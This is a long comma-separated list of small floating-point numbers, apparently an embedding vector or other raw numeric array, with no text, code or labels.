0.021976737305521965, -0.041400276124477386, 0.00799590814858675, -0.02580653689801693, -0.03006187081336975, -0.00011313953291391954, 0.010494201444089413, 0.024831928312778473, -0.04192189499735832, -0.014035736210644245, -0.04702829569578171, -0.004824998788535595, -0.027865570038557053, -0.013109171763062477, -0.01681542955338955, -0.01064519677311182, 0.06188078224658966, 0.014509313739836216, 0.015607464127242565, -0.013150352984666824, -0.036101698875427246, 0.013699428178369999, -0.0015056673437356949, -0.002860338892787695, 0.028167560696601868, -0.0694580227136612, 0.00802336260676384, 0.019286269322037697, 0.0015065252082422376, 0.02945788763463497, -0.007529194466769695, 0.016238901764154434, -0.050542376935482025, -0.024310307577252388, -0.02083740569651127, 0.0033905396703630686, -0.024502484127879143, 0.009945125319063663, -0.0036959629505872726, 0.04151009023189545, -0.006640378851443529, -0.022910164669156075, -0.0009934830013662577, 0.022910164669156075, -0.009135239757597446, 0.018778374418616295, 0.014756397344172001, 0.0007425384828820825, 0.0115237170830369, 0.012800317257642746, -0.0037543021608144045, 0.0373920239508152, -0.0023867615964263678, -0.03415248170495033, -0.013555295765399933, -0.015346653759479523, 0.015978090465068817, 0.028716636821627617, -0.043431852012872696, 0.009238190948963165, 0.010851100087165833, -0.010995232500135899, 0.029430434107780457, 0.003829800058156252, -0.0358271598815918, 0.019382357597351074, -0.015113296918570995, 0.025655541568994522, 0.003936183173209429, -0.027934204787015915, -0.0027282177470624447, -0.005658906884491444, 0.0078586395829916, 0.02061777561903, 0.026781145483255386, -0.057378366589546204, 0.02454366348683834, -0.016527164727449417, 0.01946471817791462, 0.008565573953092098, -0.031736548990011215, 0.008895019069314003, 0.03711748868227005, -0.05438590422272682, 0.057652901858091354, -0.023912228643894196, 0.00846262276172638, -0.049004968255758286, 0.03508590906858444, -0.011750211007893085, -0.03099529817700386, -0.012415964156389236, -0.0048387255519628525, -0.011372721754014492, -0.018105756491422653, -0.0005344904493540525, -0.00802336260676384, 0.02129039354622364, -0.0010003464994952083, 0.004176403861492872, -0.0054838890209794044, -0.012409101240336895, 0.028579367324709892, -0.00641045393422246, 0.008860701695084572, 0.028414644300937653, 0.017968488857150078, -0.0029083830304443836, -0.030912937596440315, -0.028853904455900192, -0.003922456409782171, 0.0395059660077095, 0.02354160137474537, -0.004523007664829493, 0.01345234364271164, -0.04796172305941582, 0.02801656536757946, -0.022800350561738014, 0.025133920833468437, -0.006578607950359583, 0.027591032907366753, 0.05298576131463051, 0.007769415155053139, 0.0017982214922085404, 0.022196367383003235, 0.0357448011636734, -0.02691841498017311, -0.0020916336216032505, -0.0035998746752738953, -0.019876524806022644, -0.0005791028379462659, 0.004186698701232672, -0.014742670580744743, -0.025600634515285492, -0.04123555123806, -0.010844236239790916, 0.019492171704769135, -0.03033640794456005, 0.01758413575589657, -0.002922110026702285, 0.014811305329203606, 0.015868274495005608, -0.050926730036735535, -0.04892260581254959, -0.01754295453429222, 0.01199729461222887, -0.016183992847800255, -0.02476329356431961, 0.0015296894125640392, 0.02414558455348015, -0.03376812860369682, 0.007625282742083073, 0.028098925948143005, -0.03382303565740585, -0.017748858779668808, 0.031736548990011215, 0.005267690867185593, -0.04510653391480446, 0.029155896976590157, -0.012910132296383381, 0.002215175423771143, 0.01522311195731163, 0.014811305329203606, -0.0059540350921452045, -0.04658903554081917, 0.004001385997980833, -0.028771543875336647, -0.003936183173209429, -0.02028833143413067, 0.012120836414396763, 0.015374107286334038, -0.0049107917584478855, 0.023816140368580818, -0.01552510354667902, -0.01522311195731163, 0.0179135799407959, -0.03396030515432358, -0.002851759549230337, -0.03579970821738243, -0.012264968827366829, 0.02708313800394535, -0.03412502631545067, -0.0006678985664620996, 0.025463365018367767, 0.0005229084054008126, -0.0346466489136219, 0.003040504176169634, 0.021853195503354073, 0.012024748139083385, 0.006760489195585251, 0.005480457562953234, 0.018998004496097565, -0.003953341860324144, -0.00018381152767688036, 0.010020623914897442, 0.016403622925281525, 0.028936266899108887, -0.011269769631326199, -0.002762534888461232, 0.056774381548166275, -0.0016892643179744482, 0.003318473696708679, -0.015744732692837715, -0.011709029786288738, 0.012690502218902111, 0.004018544685095549, -0.007666463498026133, 0.007069344166666269, -0.03083057515323162, -0.0031005593482404947, -0.01951962523162365, 0.010981505736708641, -0.012004157528281212, 0.004152381792664528, 0.011475672945380211, 0.01792730763554573, 0.02045305445790291, -0.02012360841035843, -0.016142813488841057, 0.017954761162400246, 0.049224596470594406, 0.03017168492078781, 0.049938395619392395, 0.003922456409782171, 0.010679514147341251, -0.0071997493505477905, -0.01809203065931797, -0.026328159496188164, -0.011619805358350277, -0.002841464476659894, 0.02657524310052395, -0.0015545693458989263, -0.006207982078194618, -0.0036444871220737696, -0.00009238834900315851, 0.003953341860324144, 0.0028260217513889074, -0.005274554248899221, 0.04065902158617973, -0.03357595205307007, 0.003507218323647976, -0.012594413943588734, 0.04038448631763458, -0.002952995477244258, 0.000947154825553298, -0.004653412848711014, -0.03077566809952259, 0.007350745145231485, -0.015305472537875175, -0.005428981501609087, 0.017776312306523323, -0.009608817286789417, 0.021208032965660095, -0.025875171646475792, 0.03017168492078781, 0.018188118934631348, 0.015676097944378853, 0.025284916162490845, 0.004866179544478655, 0.012162016704678535, -0.037199847400188446, 0.026890961453318596, 0.013424890115857124, -0.01182570867240429, 0.0036307601258158684, -0.029293164610862732, -0.010542244650423527, 0.005329461768269539, -0.02918335050344467, 0.013617066666483879, 0.0007987329154275358, -0.012800317257642746, -0.006441339384764433, 0.0014919404638931155, 0.0037954826839268208, -0.00536377914249897, -0.017803765833377838, 0.00044612365309149027, -0.05482516437768936, -0.0073095643892884254, 0.0013220702530816197, 0.003977363929152489, 0.0017158602131530643, -0.0009445810574106872, 0.007611555978655815, 0.03324650600552559, -0.01681542955338955, 0.021262940019369125, -0.0015828810865059495, 0.015401560813188553, -0.0027796935755759478, 0.0005486463196575642, 0.005590272601693869, 0.00584765151143074, 0.001784494612365961, -0.0186960119754076, -0.03887452930212021, -0.026163436472415924, 0.013280757702887058, -0.01975298300385475, -0.028442097827792168, -0.032560162246227264, 0.024804474785923958, -0.025984987616539, 0.0007120819645933807, -0.04980112612247467, 0.031132567673921585, -0.013575885444879532, 0.044310372322797775, 0.032450348138809204, -0.014372045174241066, -0.005792743992060423, 0.0030456518288701773, 0.005497616250067949, 0.015044662170112133, 0.014179868623614311, 0.014756397344172001, 0.029814787209033966, -0.012566960416734219, 0.024255400523543358, -0.025710448622703552, -0.018668558448553085, 0.03374067321419716, 0.005425550043582916, -0.022182641550898552, -0.006619788706302643, -0.025573180988430977, -0.023198429495096207, 0.018023395910859108, -0.010302024893462658, -0.018682286143302917, -0.018654832616448402, 0.019766708835959435, 0.003699394641444087, -0.022868985310196877, -0.000818036322016269, 0.035552624613046646, -0.005006880033761263, 0.012024748139083385, -0.030199140310287476, -0.009588226675987244, -0.005775585304945707, 0.010789329186081886, 0.0330817848443985, -0.010404976084828377, 0.015291745774447918, 0.016252627596259117, -0.03711748868227005, -0.045079078525304794, 0.016458531841635704, -0.0028689182363450527, 0.021359028294682503, -0.04104337468743324, 0.014660310000181198, 0.04046684876084328, -0.00014552639913745224, -0.0016489416593685746, -0.011750211007893085, -0.031022751703858376, -0.0012628730619326234, -0.029704971238970757, -0.01730959862470627, 0.0011667849030345678, -0.002107076346874237, 0.0007584101986140013, -0.03272488713264465, 0.0009308541775681078, -0.0019492171704769135, -0.009457821026444435, 0.025188827887177467, 0.0002878355444408953, 0.011709029786288738, -0.008009635843336582, -0.02536727674305439, -0.0028002839535474777, -0.013630793429911137, -0.00031721964478492737, 0.011207998730242252, -0.012848361395299435, 0.030912937596440315, 0.02741258218884468, 0.017076240852475166, -0.0037748925387859344, -0.02442012168467045, -0.02973242476582527, -0.04074138402938843, -0.01343175396323204, 0.03470155596733093, 0.002307832008227706, 0.017995942384004593, 0.04192189499735832, -0.00333734811283648, -0.026053620502352715, 0.01984907127916813, -0.0132670309394598, -0.0233219712972641, 0.01714487560093403, -0.021990465000271797, 0.011949250474572182, -0.0054838890209794044, -0.024914290755987167, 0.0014378908090293407, 0.022361090406775475, 0.00218428997322917, -0.01743314042687416, -0.007611555978655815, -0.010672650299966335, -0.010604016482830048, 0.008002771995961666, -0.019533352926373482, 0.012615004554390907, -0.0005297718453221023, -0.0017381664365530014, 0.02691841498017311, -0.01343175396323204, -0.00019378495926503092, -0.0006537427543662488, -0.0012851792853325605, -0.015305472537875175, -0.033054329454898834, -0.016389897093176842, 0.014056326821446419, -0.0027350811287760735, 0.025298641994595528, -0.01138644851744175, 0.01478385180234909, 0.018380293622612953, -0.010604016482830048, -0.023692598566412926, 0.012175744399428368, 0.014344591647386551, 0.006249162834137678, -0.020315784960985184, -0.0115237170830369, -0.0006636089528910816, 0.016911517828702927, 0.010350069031119347, 0.014509313739836216, -0.004790681879967451, 0.0033905396703630686, -0.0021911535877734423, -0.01025398075580597, 0.0007532626041211188, 0.008538120426237583, -0.010487337596714497, -0.0028586231637746096, -0.006743330508470535, 0.024722114205360413, 0.014523040503263474, -0.007247793488204479, -0.029650064185261726, -0.022457178682088852, -0.02013733610510826, 0.02398086152970791, 0.0009960568277165294, -0.005126990377902985, -0.013774925842881203, 0.007838048972189426, 0.005308871623128653, -0.00041180645348504186, 0.02525746263563633, 0.011269769631326199, 0.005799607373774052, 0.011214862577617168, -0.008764614351093769, 0.015538830310106277, -0.009059742093086243, 0.009670588187873363, 0.017803765833377838, 0.005123558454215527, -0.010789329186081886, 0.03242289274930954, -0.02161983773112297, 0.0028157266788184643, 0.012594413943588734, -0.0023232747334986925, 0.005751563236117363, -0.025998713448643684, -0.015387834049761295, -0.021606111899018288, 0.01116681843996048, 0.002892940305173397, -0.013122898526489735, 0.0030490835197269917, 0.004440646152943373, 0.024076949805021286, -0.0033905396703630686, 0.009039151482284069, 0.003932751715183258, 0.0526014119386673, -0.04691848158836365, -0.031187474727630615, -0.018064575269818306, 0.00921073742210865, 0.028304830193519592, 0.002427942119538784, -0.031571827828884125, 0.010741285048425198, 0.002803715644404292, -0.02211400680243969, -0.0504051074385643, 0.014275956898927689, -0.014454406686127186, -0.008393988013267517, -0.006787942722439766, -0.005706951022148132, 0.0009179852204397321, 0.02045305445790291, 0.0023507284931838512, -0.0030096187256276608, -0.004890201613306999, 0.02370632439851761, 0.013520978391170502, 0.0020024089608341455, -0.037639107555150986, 0.005518206395208836, 0.0017544670263305306, -0.004485258366912603, 0.007666463498026133, 0.018064575269818306, -0.050707101821899414, 0.019094092771410942, -0.022566992789506912, 0.002366171218454838, 0.012944449670612812, 0.015964362770318985, -0.001772483577951789, 0.00772137101739645, 0.03596442937850952, 0.0015580010367557406, 0.027179226279258728, 0.015127023681998253, 0.011187408119440079, -0.012910132296383381, -0.011427628807723522, -0.0035278084687888622, 0.028853904455900192, -0.0030765372794121504, -0.031297288835048676, -0.013184669427573681, -0.022429725155234337, 0.007796868681907654, -0.008249855600297451, -0.0010012044804170728, -0.04406328871846199, -0.012038474902510643, 0.011805118061602116, 0.0015485638286918402, 0.02056286856532097, 0.005840788129717112, -0.001460197032429278, -0.007481150329113007, 0.004478394985198975, -0.015168203972280025, 0.02028833143413067, 0.000021394631403381936, -0.012024748139083385, 0.04840098321437836, 0.010384385474026203, -0.021359028294682503, -0.02465347945690155, 0.02045305445790291, -0.007213476113975048, 0.01704878732562065, -0.012635594233870506, 0.009643134661018848, 0.013218986801803112, -0.015689825639128685, -0.001346092321909964, -0.015923183411359787, 0.0233219712972641, -0.02348669432103634, -0.0033716652542352676, -0.00015281880041584373, -0.037474386394023895, -0.017899854108691216, 0.011393311433494091, 0.006458497606217861, 0.024351488798856735, -0.00550104770809412, 0.008050816133618355, 0.0027796935755759478, -0.03678804263472557, 0.019217634573578835, -0.03931378945708275, 0.006221709307283163, 0.010151028633117676, 0.00868225283920765, 0.02370632439851761, -0.056609660387039185, 0.0057412683963775635, 0.016678161919116974, 0.04667139798402786, 0.01207965612411499, 0.0014258797746151686, -0.025298641994595528, 0.027206679806113243, -0.012553233653306961, -0.01257382333278656, 0.0022529244888573885, 0.001391562633216381, -0.0060913036577403545, -0.02536727674305439, 0.038352906703948975, -0.004323967732489109, 0.0015545693458989263, -0.00855184718966484, 0.03618406131863594, 0.005827061366289854, -0.011784527450799942, -0.03461919724941254, -0.01536038052290678, -0.04312986135482788, -0.011249179020524025, 0.021194305270910263, -0.0015897444682195783, 0.05290340259671211, -0.01108445692807436, -0.008071406744420528, 0.006290343590080738, 0.01913527213037014, 0.016019271686673164, -0.02713804505765438, -0.03341123089194298, 0.014825032092630863, 0.0015451321378350258, 0.015593737363815308, 0.01146881002932787, -0.013596476055681705, -0.014022009447216988, -0.0017656201962381601, 0.011427628807723522, 0.001089571276679635, -0.026767419651150703, 0.004879906307905912, 0.021715926006436348, -0.03352104499936104, -0.009471548721194267, -0.009396050125360489, 0.030748214572668076, 0.01362392958253622, -0.023088615387678146, 0.030034417286515236, 0.016787976026535034, 0.003484911983832717, -0.0032086586579680443, -0.014317137189209461, -0.02940298058092594, -0.038682352751493454, -0.007865503430366516, -0.0449967160820961, -0.014042600058019161, 0.00863420870155096, -0.01492112036794424, -0.013136625289916992, -0.021427663043141365, 0.022072825580835342, 0.01514075044542551, 0.028332283720374107, -0.03865489736199379, -0.01492112036794424, -0.003846958512440324, -0.012340466491878033, -0.013225850649178028, -0.006770784500986338, -0.03925888240337372, -0.03044622391462326, -0.0009239907376468182, 0.00002541617868700996, 0.03678804263472557, 0.02890881337225437, -0.0008965369779616594, 0.04505162686109543, 0.012560096569359303, -0.01012357510626316, -0.007227203343063593, -0.010501064360141754, 0.008057679049670696, -0.038352906703948975, 0.021043309941887856, -0.011592351831495762, -0.0049142236821353436, -0.028853904455900192, -0.005126990377902985, 0.022374816238880157, 0.01483875885605812, -0.00272993347607553, -0.037144940346479416, 0.002692184643819928, 0.02619088999927044, -0.008256719447672367, 0.043596576899290085, 0.042223889380693436, -0.012848361395299435, -0.04065902158617973, 0.00912837591022253, -0.019560806453227997, -0.03909415751695633, -0.03445447236299515, 0.020947221666574478, -0.01042556669563055, -0.008606755174696445, 0.004711752291768789, 0.004399465397000313, 0.007796868681907654, 0.013164079748094082, -0.003932751715183258, -0.012470872141420841, -0.008188084699213505, 0.01191493310034275, -0.007673326879739761, -0.022704262286424637, -0.01973925530910492, -0.012004157528281212, 0.008695979602634907, -0.007954727858304977, 0.03148946538567543, -0.020713863894343376, 0.021866923198103905, -0.009725495241582394, 0.013520978391170502, 0.0015931761590763927, 0.023074887692928314, 0.008846974931657314, 0.010102984495460987, 0.005356915760785341, 0.022306183353066444, 0.022182641550898552, -0.021262940019369125, -0.011626668274402618, 0.02189437672495842, 0.004028839524835348, -0.014022009447216988, 0.006249162834137678, -0.011537443846464157, -0.008085133507847786, 0.01362392958253622, 0.043157316744327545, 0.006489383056759834, -0.0208511333912611, -0.025326097384095192, -0.0001323357137152925, -0.016499711200594902, 0.019876524806022644, -0.001997261308133602, -0.0073850625194609165, -0.001381267444230616, 0.014591675251722336, 0.004224447999149561, 0.02706941030919552, -0.007515467703342438, 0.009746085852384567, 0.011853162199258804, -0.0034437314607203007, -0.010775602422654629, 0.018105756491422653, -0.010624606162309647, -0.022196367383003235, -0.028140107169747353, 0.016527164727449417, -0.015387834049761295, -0.009622544050216675, -0.0232807919383049, -0.008757750503718853, 0.016856610774993896, -0.027536123991012573, -0.009698041714727879, 0.005339757073670626, 0.03332886844873428, -0.02017851546406746, 0.015085842460393906, 0.003254986833781004, 0.012841497547924519, 0.0028654865454882383, 0.0013177805813029408, -0.022690534591674805, -0.022580720484256744, -0.014715217053890228, -0.014207322150468826, -0.02127666585147381, 0.020549140870571136, -0.0254770927131176, -0.0014353170990943909, -0.009080331772565842, -0.0031812048982828856, -0.0018599925097078085, 0.017062513157725334, -0.02311606891453266, -0.02023342438042164, 0.006170233245939016, 0.006578607950359583, -0.02945788763463497, -0.00877147726714611, 0.0066232201643288136, 0.04362402856349945, 0.021386481821537018, -0.04925205186009407, -0.008915609680116177, -0.0028466121293604374, 0.028853904455900192, 0.013884740881621838, 0.0012577255256474018, 0.014454406686127186, 0.03525063022971153, 0.025724176317453384, 0.005984920542687178, 0.008339080959558487, -0.008565573953092098, 0.009245054796338081, -0.008943063206970692, -0.014049462974071503, -0.026602696627378464, 0.01902545802295208, 0.012724819593131542, 0.008943063206970692, -0.0010226527228951454, 0.01265618484467268, -0.027206679806113243, 0.018613651394844055, -0.0026956163346767426, -0.019423536956310272, -0.031462013721466064, -0.00510296830907464, 0.01891564205288887, -0.018160663545131683, -0.004351421259343624, 0.010816782712936401, 0.012292422354221344, 0.013294484466314316, 0.0033716652542352676, 0.027494944632053375, 0.0040974742732942104, 0.012011021375656128, -0.015923183411359787, -0.016911517828702927, 0.0034694692585617304, -0.04433782771229744, 0.0054873209446668625, -0.01345234364271164, -0.02129039354622364, 0.038023460656404495, -0.00602610083296895, -0.019231360405683517, 0.01086482685059309, -0.00851752981543541, -0.018243025988340378, 0.043212223798036575, 0.0022803782485425472, -0.019313722848892212, -0.009828447364270687, -0.006077576894313097, -0.002738512819632888, 0.0012714524054899812, -0.015154477208852768, -0.013411163352429867, -0.005387801211327314, -0.005497616250067949, 0.012422828003764153, -0.0004564188129734248, -0.031516920775175095, -0.005641748197376728, 0.004921087063848972, 0.00497599458321929, 0.03390539810061455, -0.003457458224147558, 0.008085133507847786, -0.029238257557153702, -0.007899820804595947, 0.013287621550261974, 0.032230716198682785, -0.02293762005865574, 0.012855224311351776, 0.0009385755402036011, -0.0100343506783247, -0.008627344854176044, 0.011908070184290409, 0.0005357773625291884, 0.005552523769438267, -0.0009531603427603841, 0.017529228702187538, -0.01558001060038805, 0.018888188526034355, -0.018682286143302917, -0.015085842460393906, -0.006606061942875385, -0.0007850060355849564, 0.02984224073588848, 0.005899127572774887, 0.004708320368081331, 0.032175809144973755, 0.02151002362370491, -0.009883354417979717, -0.018792100250720978, -0.0024124993942677975, 0.00011753642320400104, -0.003641055431216955, 0.036760587245225906, 0.010446157306432724, -0.01400828268378973, 0.004142086487263441, 0.0037645972333848476, -0.004564187955111265, 0.0028277377132326365, -0.0006932075484655797, -0.044969264417886734, -0.027934204787015915, 0.013733744621276855, -0.016472257673740387, -0.030858030542731285, -0.012457145377993584, 0.0031794889364391565, 0.01392592117190361, -0.002712775021791458, -0.01378865260630846, -0.011297223158180714, -0.008455758914351463, 0.009238190948963165, -0.010926597751677036, -0.0026184027083218098, 0.0068497140891849995, 0.023184703662991524, 0.011901206336915493, 0.03750184178352356, 0.04151009023189545, 0.02918335050344467, -0.005401527974754572, 0.00855184718966484, -0.0004722905287053436, 0.04694593325257301, -0.026616424322128296, 0.014646582305431366, 0.014989755116403103, 0.0012611572165042162, 0.01326016802340746, -0.0020075563807040453, 0.030473677441477776, 0.024255400523543358, 0.02945788763463497, -0.00297015393152833, -0.018297933042049408, 0.013369983062148094, -0.028195014223456383, 0.010267707519233227, 0.0011093036737293005, -0.02052168734371662, 0.0011230305535718799, 0.0058064707554876804, 0.03640368953347206, -0.010926597751677036, 0.027316493913531303, 0.028332283720374107, -0.011585487984120846, 0.0013632508926093578, 0.0020487371366471052, 0.007295837625861168, 0.015209385193884373, 0.0016858326271176338, -0.010995232500135899, 0.024790748953819275, 0.03805091604590416, -0.0011453366605564952, -0.049608949571847916, -0.011180545203387737, -0.013493524864315987, 0.008647935464978218, 0.00598148861899972, -0.002136245835572481, 0.024845656007528305, 0.02940298058092594, 0.014811305329203606, -0.006262889597564936, 0.003867548890411854, 0.025463365018367767, -0.020260877907276154, 0.007330155000090599, 0.021221758797764778, 0.024804474785923958, 0.019231360405683517, 0.038627445697784424, -0.014962300658226013, 0.017886126413941383, 0.01610163226723671, -0.010974641889333725, 0.01091973390430212, 0.004365148488432169, 0.01610163226723671, -0.03110511414706707, -0.010844236239790916, -0.018668558448553085, -0.0311600212007761, 0.001526257605291903, -0.013884740881621838, -0.003467753529548645, 0.01295817643404007, -0.009807856753468513, 0.002004124689847231, 0.007927274331450462, 0.007179159205406904, -0.001823959406465292, -0.049663856625556946, 0.0020384418312460184, 0.01666443422436714, 0.004478394985198975, 0.016499711200594902, -0.016032997518777847, -0.00475636450573802, 0.006976687349379063, -0.002371318871155381, 0.0205765962600708, 0.012985629960894585, 0.01703505963087082, -0.026890961453318596, -0.009148966521024704, 0.010061804205179214, -0.024131858721375465, 0.020260877907276154, 0.0034626058768481016, -0.0006395868840627372, 0.001520252088084817, 0.009039151482284069, 0.02741258218884468, -0.009540182538330555, -0.02376123145222664, -0.006056986283510923, -0.0044509414583444595, -0.005473594181239605, 0.00895678997039795, 0.0014927983283996582, -0.021976737305521965, -0.005295144394040108, -0.01919018104672432, 0.001288610976189375, 0.016678161919116974, -0.011201135814189911, 0.0037748925387859344, 0.011400175280869007, -0.015168203972280025, -0.005775585304945707, -0.003153751138597727, -0.0002539473061915487, -0.00200584065169096, 0.017350777983665466, 0.002738512819632888, 0.016499711200594902, -0.014234776608645916, -0.030144231393933296, 0.0075635118409991264, 0.01831166073679924, -0.00663008401170373, 0.028442097827792168, 0.011894342489540577, -0.010212799534201622, 0.010315751656889915, -0.008009635843336582, -0.00536377914249897, -0.002324990462511778, -0.01864110492169857, -0.0004804408526979387, -0.007810595445334911, 0.0214002076536417, -0.003524376777932048, 0.005199056584388018, 0.010151028633117676, 0.0012748840963467956, 0.008579300716519356, 0.00003077824294450693, 0.02366514317691326, -0.029759880155324936, -0.032999422401189804, 0.002951279515400529, 0.012546369805932045, -0.016334988176822662, -0.02030205726623535, 0.009931398555636406, -0.02249835804104805, 0.03269743174314499, 0.005857946816831827, -0.009821583516895771, 0.02266308106482029, -0.010192209854722023, -0.026122255250811577, 0.012690502218902111, -0.016403622925281525, 0.012189471162855625, 0.016403622925281525, -0.018847009167075157, -0.022347362712025642, -0.016527164727449417, 0.009409776888787746, -0.00995198916643858, -0.04109828174114227, 0.031407106667757034, 0.006056986283510923, -0.00001801653161237482, 0.02127666585147381, 0.020823679864406586, 0.010411839932203293, -0.0013306495966389775, -0.015758460387587547, 0.0117776645347476, -0.007989045232534409, 0.009183283895254135, -0.008201811462640762, -0.013157215900719166, 0.018627379089593887, -0.026396794244647026, -0.004248470067977905, -0.017721403390169144, 0.01825675182044506, -0.003768028924241662, -0.008723433129489422, -0.015017208643257618, -0.011317813768982887, -0.006798238027840853, 0.021715926006436348, 0.02995205484330654, -0.04697338864207268, -0.038188185542821884, 0.00397050054743886, 0.01708996668457985, 0.00475636450573802, -0.0051544439047575, -0.022361090406775475, -0.02315725013613701, 0.025353550910949707, -0.0030199140310287476, 0.02586144581437111, -0.01295817643404007, 0.00014016432396601886, -0.006420748773962259, 0.0010252264328300953, 0.018243025988340378, 0.0011050140019506216, 0.0007498309132643044, -0.02978733368217945, 0.038352906703948975, -0.011290360242128372, -0.003356222528964281, -0.001636072644032538, -0.004337694495916367, 0.006355545949190855, 0.00943036749958992, 0.0019269109470769763, -0.005895695649087429, -0.011942386627197266, -0.001945785479620099, 0.015250565484166145, 0.019162727519869804, -0.0038572538178414106, -0.00671587698161602, 0.014632855542004108, 0.01536038052290678, 0.011969841085374355, -0.01997261308133602, -0.023033706471323967, 0.00855184718966484, 0.0006438765558414161, 0.008675388991832733, 0.009176420047879219, 0.018160663545131683, -0.015703553333878517, 0.009354869835078716, -0.03426229581236839, 0.008270446211099625, -0.025724176317453384, 0.004121496342122555, 0.029293164610862732, -0.020892314612865448, -0.006544290576130152, 0.0014378908090293407, 0.041345369070768356, -0.014303410425782204, -0.009560773149132729, 0.05301321670413017, -0.00373028009198606, -0.01990397833287716, -0.028277376666665077, -0.017529228702187538, -0.05262886360287666, 0.005857946816831827, -0.00007415733125526458, -0.018723467364907265, 0.014523040503263474, -0.022127732634544373, -0.0102882981300354, 0.01483875885605812, 0.0056692021898925304, 0.005912854336202145, 0.005003448110073805, -0.0032069426961243153, 0.007103661075234413, 0.007632146123796701, -0.025930078700184822, -0.0007116530323401093, 0.012038474902510643, 0.004735774360597134, -0.009231328032910824, 0.01552510354667902, 0.012038474902510643, 0.03192872554063797, -0.01665070652961731, -0.01279345341026783, 0.028195014223456383, -0.0008013067417778075, 0.009025424718856812, -0.00489363307133317, 0.01880582794547081, 0.001602613483555615, -0.031297288835048676, -0.0020984970033168793, -0.036595866084098816, 0.011180545203387737, 0.007096797693520784, 0.007371335290372372, 0.0013726882170885801, 0.028085200116038322, -0.03478391841053963, -0.023912228643894196, 0.03407011926174164, -0.025449639186263084, 0.007536057848483324, -0.0017690518870949745, 0.0012122552143409848, 0.025957532227039337, -0.0013452343409880996, 0.02647915482521057, 0.015621190890669823, 0.0008184653124772012, 0.003908729646354914, -0.010102984495460987, 0.00524023687466979, -0.008311626501381397, -0.0015039514983072877, -0.0010827077785506845, 0.014866212382912636, -0.01743314042687416, 0.016389897093176842, 0.01017161924391985, 0.004076883662492037, -0.003292735666036606, -0.021262940019369125, -0.012827770784497261, -0.004993153270334005, -0.008236128836870193, 0.03489373251795769, 0.009162693284451962, -0.006194255314767361, 0.019258815795183182, -0.009553909301757812, -0.013006220571696758, 0.02686350792646408, -0.005151012446731329, -0.0028277377132326365, 0.005957466550171375, 0.015319200232625008, 0.015840820968151093, 0.012285559438169003, 0.0033991190139204264, 0.004392602015286684, 0.011427628807723522, 0.001089571276679635, 0.005181897897273302, 0.0005053208442404866, -0.007151705212891102, 0.022457178682088852, -0.015854548662900925, -0.010308887809515, -0.005188761278986931, 0.01356902252882719, 0.009560773149132729, -0.016280081123113632, -0.014138688333332539, 0.023953408002853394, -0.014330863952636719, -0.012951312586665154, 0.010604016482830048, -0.0025549158453941345, -0.019560806453227997, -0.013006220571696758, -0.0034437314607203007, 0.010878553614020348, 0.02768711932003498, -0.0020813383162021637, 0.009094059467315674, -0.003699394641444087, -0.0034711852204054594, 0.004032271448522806, -0.01229928620159626, 0.004313672427088022, 0.017282143235206604, -0.004766659811139107, 0.015099570155143738, 0.017790038138628006, 0.0014533335343003273, -0.008881292305886745, -0.011379584670066833, 0.015072115696966648, -0.03324650600552559, 0.026163436472415924, -0.0023627395275980234, -0.003548398846760392, 0.012745409272611141, -0.002899803686887026, -0.0010827077785506845, 0.001048390637151897, -0.011159954592585564, -0.02576535753905773, 0.014179868623614311, 0.012374783866107464, 0.005672633647918701, -0.0009368596947751939, -0.0006957813166081905, -0.01588200218975544, -0.01704878732562065, 0.012505189515650272, 0.014179868623614311, 0.015703553333878517, -0.03514081612229347, -0.01715860143303871, 0.01951962523162365, 0.008661662228405476, 0.007728234399110079, -0.014221048913896084, -0.03467410430312157, 0.010363795794546604, -0.002608107402920723, -0.012978766113519669, -0.018352840095758438, 0.005569681990891695, 0.0068497140891849995, 0.0025034400168806314, -0.01781749166548252, 0.006214845459908247, -0.019670620560646057, 0.008510666899383068, -0.005614294670522213, 0.00014981604181230068, 0.01979416236281395, -0.004725479055196047, -0.018325386568903923, -0.015387834049761295, -0.02459857240319252, -0.03209345042705536, -0.004001385997980833, -0.009499002248048782, 0.0006910627125762403, -0.005672633647918701, -0.01039124932140112, 0.00005764217712567188, 0.023788684979081154, 0.003826368134468794, 0.005892263725399971, -0.005851083435118198, -0.002203164389356971, -0.0017295870929956436, -0.002839748514816165, 0.01990397833287716, 0.0129924938082695, -0.007865503430366516, 0.004601937253028154, 0.0042381747625768185, 0.008030225522816181, 0.010761874727904797, -0.02019224315881729, 0.0035827159881591797, -0.0017982214922085404, 0.009691178798675537, 0.007865503430366516, 0.01536038052290678, -0.0015948920045047998, -0.026561515405774117, -0.01708996668457985, -0.014550494030117989, -0.010274570435285568, 0.006863440852612257, 0.008208675310015678, -0.004643117543309927, -0.002628697780892253, 0.005840788129717112, -0.014852485619485378, -0.0008116018725559115, -0.008483212441205978, -0.006540859118103981, 0.006465361453592777, 0.009409776888787746, 0.009643134661018848, -0.006225140765309334, -0.005717246327549219, -0.020315784960985184, -0.021482570096850395, -0.02293762005865574, -0.02376123145222664, 0.03022659383714199, 0.0071997493505477905, 0.017295870929956436, 0.014825032092630863, -0.010871689766645432, -0.013088581152260303, 0.00002370031870668754, 0.018009668216109276, 0.029704971238970757, 0.014536767266690731, 0.00035432513686828315, -0.014577948488295078, 0.017007606104016304, -0.007069344166666269, -0.0035655575338751078, -0.007982181385159492, -0.010672650299966335, -0.003194931661710143, 0.002925541717559099, 0.0006811965140514076, 0.012450281530618668, -0.02603989467024803, -0.001162495231255889, 0.011317813768982887, 0.01886073499917984, 0.020096154883503914, -0.008098860271275043, 0.012855224311351776, -0.008798930794000626, -0.005453003570437431, 0.011317813768982887, 0.039670687168836594, 0.02359651029109955, 0.029155896976590157, 0.02443384937942028, 0.015113296918570995, 0.008565573953092098, 0.0017055650241672993, -0.012113972567021847, 0.004725479055196047, 0.001164211193099618, -0.0308854840695858, -0.0027059116400778294, 0.007508604321628809, -0.0038160730618983507, 0.016060451045632362, -0.009032287634909153, 0.0007146557909436524, 0.00937546044588089, -0.017968488857150078, -0.0010809919331222773, -0.002448532497510314, 0.0037611655425280333, 0.010871689766645432, -0.0012062496971338987, -0.00023442940437234938, 0.0073850625194609165, -0.013026810251176357, 0.011297223158180714, -0.0001084745381376706, -0.013472934253513813, -0.008943063206970692, 0.02442012168467045, -0.0025223144330084324, 0.006228572688996792, 0.007906683720648289, 0.0035415354650467634, 0.0005726683302782476, 0.005463298875838518, -0.009519591927528381, -0.0016506575047969818, 0.025957532227039337, 0.0049554044380784035, 0.019533352926373482, -0.0010552540188655257, 0.006842850707471371, -0.024392668157815933, -0.012113972567021847, -0.021935556083917618, -0.00008144973980961367, 0.007577238604426384, 0.0039121611043810844, 0.01072755828499794, -0.00584765151143074, -0.004152381792664528, 